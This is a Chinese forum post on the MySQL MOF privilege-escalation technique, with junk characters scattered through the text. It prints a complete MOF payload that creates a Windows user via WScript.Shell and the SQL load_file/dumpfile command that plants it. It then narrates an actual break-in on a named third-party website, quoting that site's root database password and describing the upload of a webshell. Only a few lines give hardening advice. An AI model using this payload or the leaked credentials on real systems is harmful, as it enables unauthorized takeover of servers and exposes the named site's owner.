中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]
作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法( B/ C7 g' @% r* @
& X$ I# M% L- Q- K: _
网上公开的一些利用代码:
$ c* U3 e1 a" H. ~8 T9 u% M# X! g0 ^
#pragma namespace(“\\\\.\\root\\subscription”)
% ~9 V" f; u* g" b% N7 @9 k) J  n% C' }4 o( ~+ Z
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };4 L6 j0 ^7 c" H
/ f" e3 {4 m& p4 m* W" k
% M7 k9 _& }6 f3 k
* `9 d: `! d* T* G# [$ i
  w# s5 K( y7 q+ \

7 x% h, V+ z7 ?) \1 Y" m连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;( z8 z7 I/ `$ E- C- j
从上面代码来看得出解决办法:
4 a% G" ]: A- `6 }' V9 G
3 Y# k' V# n% |2 o( f1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
. j: w) W# v# [9 e$ a! o& h  d5 `
" E4 |% b) y! b, u0 j% `2、禁止使用”WScript.Shel”组件
, p8 c# E9 N$ w! Z- v2 O0 W: x7 W; T( G
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
* l. _" r2 l( y5 D9 v9 j  ]. a9 ?% y- B' S
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
# |; `0 U$ {9 A: `: @4 H/ a
: i5 a* I) \% H事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权  W1 i2 m, X( E8 Y; u
$ h2 |6 u' }; F  j7 c2 |
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
, O  p; ?" n5 q' u* x$ W$ _* D2 U+ |6 H: p8 d% M9 v1 ^( X6 {3 P
看懂了后就开始练手吧
2 d: T8 d7 N& G- n2 w$ {1 O
$ c' R) z" G' L( F1 H, `http://www.webbmw.com/config/config_ucenter.php 一句话 a- N' h  s9 \2 d
0 f3 O. P! f! E; c9 d
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
5 p5 z% b0 {7 _! Q; y1 p
+ A' s6 s/ z( `$ X/ R于是直接用菜刀开搞
  @/ T9 ^" E3 R( A3 r: s9 Q3 j! j( z, a; v
上马先9 `- y: D5 ]2 F. ?3 o
# Y$ |) I3 u2 {1 i
既然有了那些账号 之类的 于是我们就执行吧…….
1 w: Z2 ~$ P) X1 s! n2 D/ R! |" j  o* M/ b3 g& t5 n( _4 Q1 b
小小的说下
+ n6 U$ J$ Q1 K' Y  s. j' l$ n  A% |5 r
在这里第1次执行未成功        原因未知, e, v* X: X1 \

0 }9 W( Z- ^5 x0 T" [6 V: p我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
6 y2 L8 H1 D  w5 N/ i7 x$ g& J' ?' E' U' i$ e
#pragma namespace(“\\\\.\\root\\subscription”). X& n0 Z& B; O  u

! g& H! p3 |* q" V% H) A+ k) _( Einstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };! b: m& b, V  P( [3 O5 C# U
+ \5 H( Z+ s9 C& S4 C, F
我是将文件放到C:\WINDOWS\temp\1.mof
  d; M5 |& b+ ^: l) D& J4 V$ p% j; V4 A6 u& C' H
所以我们就改下执行的代码
# T6 m) G( l; t* c; v3 {8 t* Y7 D$ u. K8 U
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
' f7 Z2 A1 l& Z, w' x
2 Z# ?) m. N, s* f/ Q' B& ?
; T' ?2 Z- U5 p, p: O2 O
, o* `/ K) x8 t8 ~但是 你会发现账号还是没有躺在那里。。+ B2 Z; `) P3 F5 V
7 |5 o) B/ Z. c7 H/ u. _
于是我就感觉蛋疼
* c0 Y- U( x$ |
) \- |# U) q# w/ S就去一个一个去执行 但是执行到第2个 mysql时就成功了………
6 c( R: r7 W0 ~7 X3 @
& g/ [+ o* _& |; d" Y  O/ s7 {
2 ~& ^6 c, V) ?) I# O( ~" w) ^. _$ V7 [; e5 j: N8 y2 I
但是其他库均不成功…8 C: [7 Z, M  Q9 E- [: T

* R6 k( o1 N) s; d6 f  X! w我就很费解呀 到底为什么不成功求大牛解答…
& G9 O* p: b; Q
$ q- c* J( C" N2 Q: G- J; G2 p8 A3 s5 C) `" C, o
" E! Q9 W) f% h1 ?0 Y2 r: t! j& d0 q




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2